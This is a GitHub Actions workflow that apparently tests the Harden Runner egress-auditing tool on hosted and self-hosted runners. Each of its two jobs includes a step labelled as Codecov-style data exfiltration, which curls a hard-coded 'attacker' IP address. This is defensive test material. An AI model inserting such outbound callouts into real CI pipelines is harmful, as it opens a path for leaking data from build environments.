name: "ARC: Secure-By-Default Cluster-Level Policy"
on:
  workflow_dispatch:
  
permissions:
  contents: read

jobs:
  direct-ip-hosted:
    runs-on: ubuntu-latest
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@17d0e2bd7d51742c71671bd19fa12bdc9d40a3d6 # v2.8.1
        with:
          egress-policy: audit

      - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0

      # Codecov Scenario: Exfiltrate data to attacker's IP address
      - name: Data Exfiltration To Attacker Controlled IP address
        run: curl 104.16.209.12 --connect-timeout 5
  direct-ip-arc:
    runs-on: self-hosted
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@17d0e2bd7d51742c71671bd19fa12bdc9d40a3d6 # v2.8.1
        with:
          egress-policy: audit

      - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0

      # Codecov Scenario: Exfiltrate data to attacker's IP address
      - name: Data Exfiltration To Attacker Controlled IP address
        run: curl 104.16.209.12 --connect-timeout 5
